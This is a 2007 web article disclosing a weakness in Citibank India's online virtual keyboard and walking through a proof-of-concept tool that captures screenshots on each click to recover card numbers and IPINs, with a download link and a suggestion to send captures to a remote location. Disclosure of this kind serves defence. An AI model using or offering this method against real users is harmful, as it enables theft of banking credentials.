, Guest!
Already a Member? Login or Register.



Main Menu



Login

Username:


Password:




Stay logged in
across browser sessions



 Home > Articles > Security > Citiank.co.in Virtual Keyboard Key Capture

Citiank.co.in Virtual Keyboard Key Capture


Posted: May 7th, 2007 @ 5:40am


Defeating Citibank Virtual Keyboard protection using screenshot method

By Yash K.S <yashks@gmail.com>

http://www.tracingbug.com

 

Disclaimer:

 

Author takes no responsibilities for any actions with provided information’s or codes. The copyright for any material created by the author is reserved. Any duplication of codes or texts provided here in electronic or printed publications is not permitted without the author's agreement.

 

 

Original URL: http://www.tracingbug.com/index.php/articles/view/23.html

 

 

Description:

 

Citibank Virtual Keyboard is a security enhancement for protecting from the key loggers. Using this virtual keyboard user can enter Card no and IPIN using mouse. This keyboard will display a keys in random position in a virtual keyboard on the screen where it makes little difficult for password capture. This only gives confidence for end user from key loggers not from other methods. Local attacker can use Win32 API’s to capture using screen shot method and obtain sensitive information including Credit Card/Debit Card (Suvidha Account), IPIN and misuse it.

 

Note:

My intension is to help people to try out the POC and understand themself (offcourse, if you can code yourself one, Please, do it)

 

Platforms Affected:

 

  • Microsoft Corporation: Windows 98 Any version
  • Microsoft Corporation: Windows Me Any version
  • Microsoft Corporation: Windows XP Any version
  • Microsoft Corporation: Windows 2000 Any version
  • Microsoft Corporation: Windows 2003 Any version
  • Microsoft Corporation: Windows NT 4.0 Any version
  • Citi-Bank: Citi-Bank Virtual Keyboard Any version

 

Browsers:

  • Microsoft Internet Explorer Any version
  • Mozilla FireFox Any version
  • Any browser runs on Win32 platform( with slight modification )

References:

CitiBank Web site - http://www.citibank.com/us

 

Step by Step Demo(People who likes to check POC can do so, it does not have any malware):

 

§         Download POC from http://tracingbug.com/downloads/citihook.zip and unzip to some directory

§         Launch citihook.exe, this will watch only https://www.online.citibank.co.in/ URL

§         Visit https://www.online.citibank.co.in/

§         In Right side of the screen in “Login to Citibank online” click “Go” button

§         You will land in following screen for typing card number and IPIN

 

 

 

§         Any click happens on above screen will be captured by the citihook module. All the screen shot will be placed in directory c:\citilogon and you can read the bitmaps one by one and you can construct the password manually. To determine the order of the keys you can check the filenames. In following screen shot you can see user has entered “YASHKS

 

 

 

§         Local attacker can make sure he can send this file to remote location for doing further damage. This can be done easily since file size is less. Attacker can do lot of optimization based on this method.


Copyright © 2005-2008 Yashks.com. All Rights Reserved

Processing Time: 0.04953 seconds.
 
Management Login

Powered By FlexCMS
Powered By FlexCMS